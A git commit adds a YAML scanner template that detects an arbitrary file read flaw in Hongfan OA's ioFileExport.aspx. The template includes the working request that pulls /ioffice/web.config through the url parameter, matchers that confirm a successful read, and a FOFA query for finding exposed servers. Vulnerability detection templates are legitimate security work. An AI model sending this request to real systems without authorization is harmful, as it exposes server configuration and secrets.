Create hongfan-ioffice-lfi.yaml
parent
d0a56077a8
commit
92fb456022
|
@ -0,0 +1,32 @@
|
|||
id: hongfan-ioffice-lfi
|
||||
|
||||
info:
|
||||
name: Hongfan OA ioFileExport.aspx - Arbitrary File Read
|
||||
author: SleepingBag945
|
||||
severity: medium
|
||||
description: |
|
||||
Arbitrary File Read vulnerability in the Hongfan OA ioFileExport.aspx file, through which an attacker can obtain sensitive server information
|
||||
reference:
|
||||
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%BA%A2%E5%B8%86OA/%E7%BA%A2%E5%B8%86OA%20ioFileExport.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
||||
- https://github.com/qingchenhh/qc_poc/blob/main/Goby/ioffice_file_read.go
|
||||
metadata:
|
||||
max-request: 1
|
||||
fofa-query: app="红帆-ioffice"
|
||||
verified: true
|
||||
tags: hongfan,lfi
|
||||
|
||||
variables:
|
||||
filename: "{{rand_base(5)}}"
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename={{filename}}.txt&ContentType=application/octet-stream"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "configSection") && contains(body, "iOfficeUpload")'
|
||||
- 'contains(header, "application/octet-stream")'
|
||||
condition: and
|
Loading…
Reference in New Issue